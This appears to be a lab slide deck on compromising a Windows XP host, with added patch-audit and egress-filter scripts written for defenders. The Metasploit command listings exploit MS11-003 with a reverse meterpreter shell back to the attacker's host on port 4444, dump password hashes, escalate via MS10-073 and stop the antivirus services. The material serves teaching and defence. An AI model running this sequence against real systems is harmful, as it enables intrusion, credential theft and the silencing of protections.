2. Scenario 2 : Topology
Target --- 192.168.111.0/24 --- Firewall Gateway --- 192.168.178.0/24 --- Attacker
Target :
- Windows XP SP3 - User «test» has a limited (non-administrator) account
- IP : 192.168.111.129 - Default gateway : 192.168.111.128
- Antivirus : Ad-Aware Free / Windows Defender
- Local Windows Firewall enabled
- Vulnerable to MS11-003 & MS10-073
Firewall Gateway :
- Eth0 : 192.168.111.128 (internal interface)
- Eth1 : 192.168.178.59 (external interface)
Attacker :
- IP : 192.168.178.21
3. Scenario 2 : Firewall rules
• Firewall administration by SSH, only from the internal network
• The internal network is allowed to initiate «Any» protocol towards the external network
4. Scenario 2 : Story-Board
✤ This network topology corresponds to most broadband ADSL Internet connections for home users and SMBs.
✤ The target runs three active local countermeasure products : as you will see, none of them reacts to anything !
✤ Up-to-date Ad-Aware Free with default configuration.
✤ Windows Defender with default configuration.
✤ Windows Firewall with default configuration.
✤ The target is vulnerable to the MS11-003 Internet Explorer vulnerability and to the MS10-073 Keyboard Layout vulnerability
✤ MS11-003 will be our entry point
✤ MS10-073 will be our privilege escalation vector. (Stuxnet)
5. Scenario 2 : Story-Board
✤ The attacker sends a Twitter message to the target. The message contains a malicious URL (possibly shortened) intended to
exploit the Internet Explorer MS11-003 vulnerability.
✤ The target clicks on the provided link and MS11-003 is exploited. After exploitation a reverse_tcp meterpreter
payload, on port 4444/TCP, is launched.
✤ The attacker checks the installed countermeasures and tries to kill them, without success because of the limited privileges.
✤ The attacker has to check whether any of these Microsoft patches is installed before attempting the MS10-073 privilege escalation :
✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)
✤ If any of these patches is installed, the MS10-073 privilege escalation is not possible. winenum is the way to check.
✤ The attacker then runs the MS10-073 post-exploitation privilege escalation.
✤ The attacker stops the following services : Windows Defender / Lavasoft Ad-Aware Service
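The story-board turns on whether one of the three patches listed above is present on the host. The same question, asked from the defender's side, is a patch-compliance check. The following script is an added example, not part of the original slides or of Metasploit: it parses a hotfix listing of the kind `wmic qfe get HotFixID` produces on Windows XP, and reports which of the slides' three KBs are missing. The sample listings are constructed; only the KB numbers come from the slides.

```python
"""Added example (not from the original slides): a defender-side patch audit.

Given the hotfix list a Windows host reports (for example the output of
`wmic qfe get HotFixID`), report which of the three patches named on the
slides are missing. Any one of them closes the MS10-073 keyboard-layout
privilege escalation; the list here is exactly the one the slides give."""

import re

# Patches named on the slides, keyed by bulletin; any one of them blocks MS10-073.
MS10_073_FIXES = {
    "MS10-073": "KB981957",
    "MS10-098": "KB2436673",
    "MS11-012": "KB2479628",
}

# Constructed sample of `wmic qfe get HotFixID` output for an unpatched host
# (the other KB numbers are placeholders, not taken from the slides).
SAMPLE_UNPATCHED = """HotFixID
KB2079403
KB2229593
KB2286198
"""

# Constructed sample for a host that received the MS10-098 update.
SAMPLE_PATCHED = """HotFixID
KB2079403
KB2436673
KB2229593
"""


def parse_hotfix_list(text):
    """Return the set of KB identifiers found in a hotfix listing."""
    return set(re.findall(r"\bKB\d+\b", text))


def audit_ms10_073(installed):
    """Return (protected, present, missing).

    present: bulletins whose KB is installed; missing: the rest.
    protected is True when at least one of the fixes is present."""
    present = {b: kb for b, kb in MS10_073_FIXES.items() if kb in installed}
    missing = {b: kb for b, kb in MS10_073_FIXES.items() if kb not in installed}
    return (len(present) > 0, present, missing)


def audit_text(text):
    """Convenience wrapper: audit straight from raw listing text."""
    return audit_ms10_073(parse_hotfix_list(text))


if __name__ == "__main__":
    for name, sample in (("unpatched", SAMPLE_UNPATCHED), ("patched", SAMPLE_PATCHED)):
        protected, present, missing = audit_text(sample)
        print(f"{name}: protected={protected} present={sorted(present)} missing={sorted(missing)}")
```

Run against a real `wmic qfe` dump, the script gives the answer the story-board describes the attacker looking for, but in the defender's hands: an unpatched XP host reports all three KBs missing, a host with any one of them reports protected.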
6. Scenario 2 : Metasploit commands
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
migrate X -> to another process
kill X -> 2 times -> notepad.exe & main iexplorer.exe processes
run getcountermeasure
run getcountermeasure -k
getuid
shell
echo %USERNAME%
getprivs
getsystem
hashdump
sysinfo
ipconfig
route
background
7. Scenario 2 : Metasploit commands
use post/windows/escalate/ms10_073_kbdlayout
set SESSION 1
run
sessions -i 1
getuid
migrate X -> to a «NT AUTHORITY\SYSTEM» process
shell
echo %USERNAME%
net start
net stop "Lavasoft Ad-Aware Service"
net stop "Windows Defender"
net start
ps
8. Scenario 2 : Lessons Learned
•Update your OS and applications !
•Never click on unknown links, especially shortened URLs, from unknown sources !
•Don't trust your antivirus ! Select an antivirus that detects basic attacks !
•Don't trust your firewalls (local or remote) !
•Don't allow «Any» outbound protocol connections from your internal network to
untrusted networks ! Limit your outbound connections to your real needs.
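The last lesson is the one the gateway rules on slide 3 violated. The following is an added example, not part of the original slides and not the syntax of any real firewall: a small first-match egress evaluator that runs the two connections from the scenario (the browser fetch of the exploit page on port 80 and the meterpreter reverse connection on port 4444) through the slide's «Any outbound» policy and through a restricted one. The rule format, the allowed ports in the restricted policy and the sample flows are assumptions made for the illustration; the addresses are the ones on the topology slide.

```python
"""Added example (not from the original slides): a first-match egress policy
evaluator contrasting the slides' "Any outbound" rule with a restricted one.

The rule format, the evaluator and the sample flows are assumptions made for
this illustration; they are not the syntax of any real firewall product."""

import ipaddress
from dataclasses import dataclass

INTERNAL = ipaddress.ip_network("192.168.111.0/24")   # from the topology slide
ANY = ipaddress.ip_network("0.0.0.0/0")


@dataclass(frozen=True)
class Rule:
    action: str                     # "allow" or "deny"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    proto: str                      # "tcp", "udp" or "any"
    dports: frozenset               # empty set = any destination port

    def matches(self, src, dst, proto, dport):
        return (src in self.src and dst in self.dst
                and self.proto in ("any", proto)
                and (not self.dports or dport in self.dports))


# Slide 3 policy: the internal network may reach external on "Any" protocol.
WEAK_POLICY = [
    Rule("allow", INTERNAL, ANY, "any", frozenset()),
    Rule("deny", ANY, ANY, "any", frozenset()),
]

# Restricted policy (assumed example): web browsing and DNS only, all else dropped.
# The port set is constructed for illustration; a real site lists its actual needs.
RESTRICTED_POLICY = [
    Rule("allow", INTERNAL, ANY, "tcp", frozenset({80, 443})),
    Rule("allow", INTERNAL, ANY, "udp", frozenset({53})),
    Rule("deny", ANY, ANY, "any", frozenset()),
]


def evaluate(policy, src, dst, proto, dport):
    """First matching rule decides; a policy with no match denies by default."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for rule in policy:
        if rule.matches(src, dst, proto, dport):
            return rule.action
    return "deny"


# Constructed flows based on the slides: the browser fetch of the exploit page
# served on port 80, and the payload's reverse connection to port 4444.
FLOWS = {
    "http_to_attacker": ("192.168.111.129", "192.168.178.21", "tcp", 80),
    "reverse_tcp_4444": ("192.168.111.129", "192.168.178.21", "tcp", 4444),
}


def decisions(policy):
    """Map each sample flow to the policy's decision for it."""
    return {name: evaluate(policy, *flow) for name, flow in FLOWS.items()}


if __name__ == "__main__":
    print("weak:      ", decisions(WEAK_POLICY))
    print("restricted:", decisions(RESTRICTED_POLICY))
```

Under the weak policy both flows are allowed. Under the restricted policy the fetch of the exploit page on port 80 still goes through, because web browsing is a real need, but the callback on 4444/TCP is dropped at the gateway. That is exactly the split the lessons list draws: egress filtering removes the channel the payload relied on here, while the first two lessons (patching, not clicking unknown links) are what stop the page from being loaded in the first place.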